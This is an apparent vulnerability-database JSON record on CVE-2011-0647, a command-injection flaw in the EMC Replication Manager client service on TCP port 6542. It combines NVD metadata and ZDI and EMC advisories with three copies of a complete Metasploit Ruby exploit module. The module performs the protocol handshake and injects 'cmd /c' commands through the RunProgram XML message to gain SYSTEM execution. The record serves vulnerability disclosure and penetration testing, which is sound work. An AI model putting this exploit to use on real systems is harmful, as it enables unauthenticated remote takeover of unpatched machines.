{"cve": [{"lastseen": "2020-12-09T19:39:04", "description": "The irccd.exe service in EMC Replication Manager Client before 5.3 and NetWorker Module for Microsoft Applications 2.1.x and 2.2.x allows remote attackers to execute arbitrary commands via the RunProgram function to TCP port 6542.", "edition": 5, "cvss3": {}, "published": "2011-02-10T18:00:00", "title": "CVE-2011-0647", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0647"], "modified": "2018-10-09T19:29:00", "cpe": ["cpe:/a:emc:replication_manager:5.2", "cpe:/a:emc:networker_module:2.1", "cpe:/a:emc:networker_module:2.2", "cpe:/a:emc:replication_manager:2.0", "cpe:/a:emc:replication_manager:5.2.2", "cpe:/a:emc:replication_manager:5.2.3"], "id": "CVE-2011-0647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0647", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:emc:replication_manager:5.2.2:*:client:*:*:*:*:*", "cpe:2.3:a:emc:replication_manager:5.2:*:client:*:*:*:*:*", "cpe:2.3:a:emc:networker_module:2.1:-:microsoft_applications:*:*:*:*:*", "cpe:2.3:a:emc:replication_manager:2.0:*:client:*:*:*:*:*", "cpe:2.3:a:emc:replication_manager:5.2.3:*:client:*:*:*:*:*", "cpe:2.3:a:emc:networker_module:2.2:-:microsoft_applications:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-09T19:45:30", "edition": 2, "description": "This Metasploit module exploits a remote command-injection vulnerability in EMC Replication Manager client (irccd.exe). 
By sending a specially crafted message invoking RunProgram function an attacker may be able to execute arbitrary code commands with SYSTEM privileges. Affected products are EMC Replication Manager < 5.3. This Metasploit module has been successfully tested against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested against these products.", "published": "2013-10-23T00:00:00", "type": "zdt", "title": "EMC Replication Manager Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2013-10-23T00:00:00", "id": "1337DAY-ID-21407", "href": "https://0day.today/exploit/description/21407", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::CmdStagerVBS\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'EMC Replication Manager Command Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command-injection vulnerability in EMC Replication Manager\r\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\r\n attacker may be able to execute arbitrary code commands with SYSTEM privileges. Affected\r\n products are EMC Replication Manager < 5.3. This module has been successfully tested\r\n against EMC Replication Manager 5.2.1 on XP/W2003. 
EMC Networker Module for Microsoft\r\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\r\n against these products.\r\n },\r\n 'Author' =>\r\n [\r\n 'Unknown', #Initial discovery\r\n 'Davy Douhine' #MSF module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-0647' ],\r\n [ 'OSVDB', '70853' ],\r\n [ 'BID', '46235' ],\r\n [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ]\r\n ],\r\n 'DisclosureDate' => 'Feb 07 2011',\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n # Tested on Windows XP and Windows 2003\r\n [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 5\r\n },\r\n 'DefaultTarget' => 0,\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(6542)\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n execute_cmdstager({:linemax => 5000})\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n connect\r\n hello = \"1HELLOEMC00000000000000000000000\"\r\n vprint_status(\"Sending hello...\")\r\n sock.put(hello)\r\n result = sock.get_once || ''\r\n if result =~ /RAWHELLO/\r\n vprint_good(\"Expected hello response\")\r\n else\r\n disconnect\r\n fail_with(Failure::Unknown ,\"Failed to hello the server\")\r\n end\r\n\r\n start_session = \"EMC_Len0000000136<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><ir_message ir_sessionId=0000 ir_type=\\\"ClientStartSession\\\" <ir_version>1</ir_version></ir_message>\"\r\n vprint_status(\"Starting session...\")\r\n sock.put(start_session)\r\n result = sock.get_once || ''\r\n if result =~ /EMC/\r\n vprint_good(\"A session has been created. 
Good.\")\r\n else\r\n disconnect\r\n fail_with(Failure::Unknown, \"Failed to create the session\")\r\n end\r\n\r\n run_prog = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?> \"\r\n run_prog << \"<ir_message ir_sessionId=\\\"01111\\\" ir_requestId=\\\"00000\\\" ir_type=\\\"RunProgram\\\" ir_status=\\\"0\\\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>\"\r\n run_prog << \"<ir_runProgramAppInfo><?xml version=\"1.0\" encoding=\"UTF-8\"?> <ir_message ir_sessionId=\"00000\" ir_requestId=\"00000\" \"\r\n run_prog << \"ir_type=\"App Info\" ir_status=\"0\"><IR_groupEntry IR_groupType=\"anywriter\" IR_groupName=\"CM1109A1\" IR_groupId=\"1\" \"\r\n run_prog << \"><?xml version=\"1.0\" encoding=\"UTF-8\"? > <ir_message ir_sessionId=\"00000\" \"\r\n run_prog << \"ir_requestId=\"00000\"ir_type=\"App Info\" ir_status=\"0\"><aa_anywriter_ccr_node>CM1109A1\"\r\n run_prog << \"</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0\"\r\n run_prog << \"</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1\"\r\n run_prog << \"</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>\"\r\n run_prog << \"</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1\"\r\n run_prog << \"</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0\"\r\n run_prog << \"</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&\"\r\n run_prog << \";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path\"\r\n run_prog << \"></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300\"\r\n run_prog << 
\"</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>\"\r\n run_prog << \"</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339\"\r\n run_prog << \"</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message></ir_runProgramAppInfo>\"\r\n run_prog << \"<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>\"\r\n run_prog_header = \"EMC_Len000000\"\r\n run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog\r\n\r\n vprint_status(\"Executing command....\")\r\n sock.put(run_prog_packet)\r\n sock.get_once(-1, 1)\r\n\r\n end_string = Rex::Text.rand_text_alpha(rand(10)+32)\r\n sock.put(end_string)\r\n sock.get_once(-1, 1)\r\n disconnect\r\n\r\n end\r\nend\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21407"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:05", "description": "", "published": "2013-10-23T00:00:00", "type": "packetstorm", "title": "EMC Replication Manager Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2013-10-23T00:00:00", "id": "PACKETSTORM:123730", "href": "https://packetstormsecurity.com/files/123730/EMC-Replication-Manager-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::CmdStagerVBS \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'EMC Replication Manager Command Execution', \n'Description' => %q{ \nThis module exploits a remote command-injection vulnerability in EMC Replication Manager \nclient (irccd.exe). 
By sending a specially crafted message invoking RunProgram function an \nattacker may be able to execute arbitrary code commands with SYSTEM privileges. Affected \nproducts are EMC Replication Manager < 5.3. This module has been successfully tested \nagainst EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft \nApplications 2.1 and 2.2 may be vulnerable too although this module have not been tested \nagainst these products. \n}, \n'Author' => \n[ \n'Unknown', #Initial discovery \n'Davy Douhine' #MSF module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2011-0647' ], \n[ 'OSVDB', '70853' ], \n[ 'BID', '46235' ], \n[ 'URL', 'http://www.securityfocus.com/archive/1/516260' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ] \n], \n'DisclosureDate' => 'Feb 07 2011', \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n'Payload' => \n{ \n'Space' => 4096, \n'DisableNops' => true \n}, \n'Targets' => \n[ \n# Tested on Windows XP and Windows 2003 \n[ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ] \n], \n'DefaultOptions' => \n{ \n'WfsDelay' => 5 \n}, \n'DefaultTarget' => 0, \n'Privileged' => true \n)) \n \nregister_options( \n[ \nOpt::RPORT(6542) \n], self.class) \nend \n \ndef exploit \nexecute_cmdstager({:linemax => 5000}) \nend \n \ndef execute_command(cmd, opts) \nconnect \nhello = \"1HELLOEMC00000000000000000000000\" \nvprint_status(\"Sending hello...\") \nsock.put(hello) \nresult = sock.get_once || '' \nif result =~ /RAWHELLO/ \nvprint_good(\"Expected hello response\") \nelse \ndisconnect \nfail_with(Failure::Unknown ,\"Failed to hello the server\") \nend \n \nstart_session = \"EMC_Len0000000136<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><ir_message ir_sessionId=0000 ir_type=\\\"ClientStartSession\\\" <ir_version>1</ir_version></ir_message>\" \nvprint_status(\"Starting session...\") \nsock.put(start_session) \nresult = sock.get_once || '' \nif result =~ /EMC/ \nvprint_good(\"A session 
has been created. Good.\") \nelse \ndisconnect \nfail_with(Failure::Unknown, \"Failed to create the session\") \nend \n \nrun_prog = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?> \" \nrun_prog << \"<ir_message ir_sessionId=\\\"01111\\\" ir_requestId=\\\"00000\\\" ir_type=\\\"RunProgram\\\" ir_status=\\\"0\\\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>\" \nrun_prog << \"<ir_runProgramAppInfo><?xml version=\"1.0\" encoding=\"UTF-8\"?> <ir_message ir_sessionId=\"00000\" ir_requestId=\"00000\" \" \nrun_prog << \"ir_type=\"App Info\" ir_status=\"0\"><IR_groupEntry IR_groupType=\"anywriter\" IR_groupName=\"CM1109A1\" IR_groupId=\"1\" \" \nrun_prog << \"><?xml version=\"1.0\" encoding=\"UTF-8\"? > <ir_message ir_sessionId=\"00000\" \" \nrun_prog << \"ir_requestId=\"00000\"ir_type=\"App Info\" ir_status=\"0\"><aa_anywriter_ccr_node>CM1109A1\" \nrun_prog << \"</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0\" \nrun_prog << \"</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1\" \nrun_prog << \"</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>\" \nrun_prog << \"</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1\" \nrun_prog << \"</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0\" \nrun_prog << \"</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&\" \nrun_prog << \";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path\" \nrun_prog << \"></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300\" \nrun_prog << \"</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>\" \nrun_prog 
<< \"</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339\" \nrun_prog << \"</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message></ir_runProgramAppInfo>\" \nrun_prog << \"<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>\" \nrun_prog_header = \"EMC_Len000000\" \nrun_prog_packet = run_prog_header + run_prog.length.to_s + run_prog \n \nvprint_status(\"Executing command....\") \nsock.put(run_prog_packet) \nsock.get_once(-1, 1) \n \nend_string = Rex::Text.rand_text_alpha(rand(10)+32) \nsock.put(end_string) \nsock.get_once(-1, 1) \ndisconnect \n \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123730/replication_manager_exec.rb.txt"}], "exploitdb": [{"lastseen": "2017-03-23T13:17:09", "description": "EMC Replication Manager < 5.3 - Command Execution (Metasploit). CVE-2011-0647. Local exploit for Windows platform", "published": "2017-03-23T00:00:00", "type": "exploitdb", "title": "EMC Replication Manager < 5.3 - Command Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2017-03-23T00:00:00", "id": "EDB-ID:41704", "href": "https://www.exploit-db.com/exploits/41704/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'EMC Replication Manager Command Execution',\r\n 'Description' => %q{\r\n This module exploits a remote command-injection vulnerability in EMC Replication Manager\r\n client (irccd.exe). 
By sending a specially crafted message invoking RunProgram function an\r\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\r\n products are EMC Replication Manager < 5.3. This module has been successfully tested\r\n against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft\r\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\r\n against these products.\r\n },\r\n 'Author' =>\r\n [\r\n 'Unknown', #Initial discovery\r\n 'Davy Douhine' #MSF module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-0647' ],\r\n [ 'OSVDB', '70853' ],\r\n [ 'BID', '46235' ],\r\n [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],\r\n [ 'ZDI', '11-061' ]\r\n ],\r\n 'DisclosureDate' => 'Feb 07 2011',\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n # Tested on Windows XP and Windows 2003\r\n [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]\r\n ],\r\n 'CmdStagerFlavor' => 'vbs',\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 5\r\n },\r\n 'DefaultTarget' => 0,\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(6542)\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n execute_cmdstager({:linemax => 5000})\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n connect\r\n hello = \"1HELLOEMC00000000000000000000000\"\r\n vprint_status(\"Sending hello...\")\r\n sock.put(hello)\r\n result = sock.get_once || ''\r\n if result =~ /RAWHELLO/\r\n vprint_good(\"Expected hello response\")\r\n else\r\n disconnect\r\n fail_with(Failure::Unknown, \"Failed to hello the server\")\r\n end\r\n\r\n start_session = \"EMC_Len0000000136<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><ir_message ir_sessionId=0000 ir_type=\\\"ClientStartSession\\\" <ir_version>1</ir_version></ir_message>\"\r\n vprint_status(\"Starting 
session...\")\r\n sock.put(start_session)\r\n result = sock.get_once || ''\r\n if result =~ /EMC/\r\n vprint_good(\"A session has been created. Good.\")\r\n else\r\n disconnect\r\n fail_with(Failure::Unknown, \"Failed to create the session\")\r\n end\r\n\r\n run_prog = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?> \"\r\n run_prog << \"<ir_message ir_sessionId=\\\"01111\\\" ir_requestId=\\\"00000\\\" ir_type=\\\"RunProgram\\\" ir_status=\\\"0\\\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>\"\r\n run_prog << \"<ir_runProgramAppInfo><?xml version=\"1.0\" encoding=\"UTF-8\"?> <ir_message ir_sessionId=\"00000\" ir_requestId=\"00000\" \"\r\n run_prog << \"ir_type=\"App Info\" ir_status=\"0\"><IR_groupEntry IR_groupType=\"anywriter\" IR_groupName=\"CM1109A1\" IR_groupId=\"1\" \"\r\n run_prog << \"><?xml version=\"1.0\" encoding=\"UTF-8\"?\t> <ir_message ir_sessionId=\"00000\" \"\r\n run_prog << \"ir_requestId=\"00000\"ir_type=\"App Info\" ir_status=\"0\"><aa_anywriter_ccr_node>CM1109A1\"\r\n run_prog << \"</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0\"\r\n run_prog << \"</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1\"\r\n run_prog << \"</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>\"\r\n run_prog << \"</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1\"\r\n run_prog << \"</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0\"\r\n run_prog << \"</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&\"\r\n run_prog << \";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path\"\r\n run_prog << 
\"></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300\"\r\n run_prog << \"</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>\"\r\n run_prog << \"</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339\"\r\n run_prog << \"</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message></ir_runProgramAppInfo>\"\r\n run_prog << \"<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>\"\r\n run_prog_header = \"EMC_Len000000\"\r\n run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog\r\n\r\n vprint_status(\"Executing command....\")\r\n sock.put(run_prog_packet)\r\n sock.get_once(-1, 1)\r\n\r\n end_string = Rex::Text.rand_text_alpha(rand(10)+32)\r\n sock.put(end_string)\r\n sock.get_once(-1, 1)\r\n disconnect\r\n\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41704/"}, {"lastseen": "2017-03-23T13:17:08", "description": "EMC Replication Manager < 5.3 - Command Execution (Metasploit). CVE-2011-0647. 
Local exploit for Windows platform", "published": "2017-03-23T00:00:00", "type": "exploitdb", "title": "EMC Replication Manager < 5.3 - Command Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2017-03-23T00:00:00", "id": "EDB-ID:41703", "href": "https://www.exploit-db.com/exploits/41703/", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41703/"}], "zdi": [{"lastseen": "2020-06-22T11:41:09", "bulletinFamily": "info", "cvelist": ["CVE-2011-0647"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the EMC Replication Manager Client. Authentication is not required to exploit this vulnerability. The Replication Manager client installs a service that binds the irccd.exe process to TCP port 6542. This service accepts commands using an XML-based protocol. It exposes a vulnerability through its RunProgram functionality. 
By abusing this function an attacker can execute arbitrary code under the context of the currently logged-in user.", "modified": "2011-06-22T00:00:00", "published": "2011-02-07T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-11-061/", "id": "ZDI-11-061", "title": "(0Day) EMC Replication Manager Client irccd.exe Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0647"], "description": "ZDI-11-061: EMC Replication Manager Client irccd.exe Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-061\r\n\r\nFebruary 7, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0647\r\n\r\n-- CVSS:\r\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n-- Affected Vendors:\r\nEMC\r\n\r\n-- Affected Products:\r\nEMC Replication Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 8028. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of the EMC Replication Manager Client.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe Replication Manager client installs a service that binds the irccd.exe\r\nprocess to TCP port 6542. This service accepts commands using an\r\nXML-based protocol. It exposes a vulnerability through its RunProgram\r\nfunctionality. By abusing this function an attacker can execute\r\narbitrary code under the context of the currently logged-in user.\r\n\r\n-- Vendor Response:\r\nEMC has stated that this vulnerability has been fixed in EMC Replication\r\nManager version 5.3 available through EMC Powerlink. 
However, the bug is\r\nstill present in the EMC Networker Module for Microsoft Applications. It\r\nwill be fixed in these products at a later date. EMC has released\r\nSecurity Advisory ESA-2011-004 to address this issue (covering\r\nCVE-2011-0647).\r\n\r\n-- Disclosure Timeline:\r\n2009-10-27 - Vulnerability reported to vendor\r\n2011-02-07 - Public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2011-02-14T00:00:00", "published": "2011-02-14T00:00:00", "id": "SECURITYVULNS:DOC:25709", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25709", "title": "ZDI-11-061: EMC Replication Manager Client irccd.exe Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0647"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2011-012: Security update for EMC NetWorker Module for Microsoft Applications.\r\n\r\nEMC Identifier: ESA-2011-012\r\n\r\nCVE Identifier: CVE-2011-0647\r\n\r\nSeverity Rating: CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)\r\n\r\nAffected products:\r\n\r\nEMC NetWorker Module for Microsoft Applications 2.1.x\r\nEMC NetWorker Module for Microsoft Applications 2.2.x\r\n\r\nVulnerability Summary: \r\n \r\nA vulnerability exists in EMC Replication Manager which is embedded in NetWorker Module for Microsoft Applications (NMM). The\r\nvulnerability may allow arbitrary code execution on vulnerable installations of the product. \r\n\r\nVulnerability Details: \r\n \r\nEMC Replication Manager contains a potential vulnerability that may allow remote unauthenticated user to execute arbitrary code on\r\nvulnerable installations of EMC Replication Manager (Refer to EMC Knowledgebase solution emc260506 for details on ESA-2011-004). 
Because\r\nNetWorker Module for Microsoft Applications embeds Replication Manager code, NMM users were also determined to be vulnerable. \r\n\r\nProblem Resolution: \r\n \r\nThe following EMC products contain resolutions to this issue: \r\n \r\nEMC NetWorker Module for Microsoft Applications 2.3\r\n\r\nRefer to EMC Knowledgebase solution emc260506 for details on fixes for EMC Replication Manager related to ESA-2011-004. \r\n\r\nEMC strongly recommends that all customers upgrade to latest version of the products, which contain the resolution to this issue, at the\r\nearliest opportunity. \r\n\r\nLink to remedies:\r\n\r\nRegistered EMC Powerlink customers can download software from Powerlink.\r\n \r\nFor NetWorker Module Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads J-O > NetWorker\r\nModule. \r\n\r\nBecause the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a\r\nsoftware download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045.\r\n\r\nCredits: EMC would like to thank an anonymous researcher working with TippingPoint's Zero Day Initiative\r\n(http://www.zerodayinitiative.com) for reporting this issue.\r\n\r\nFor explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends that all customers take into account\r\nboth the base score and any relevant temporal and environmental scores, which may impact the potential severity associated with particular\r\nsecurity vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important\r\nsecurity information. EMC recommends all users determine the applicability of this information to their individual situations and take\r\nappropriate action. The information set forth herein is provided "as is" without warranty of any kind. 
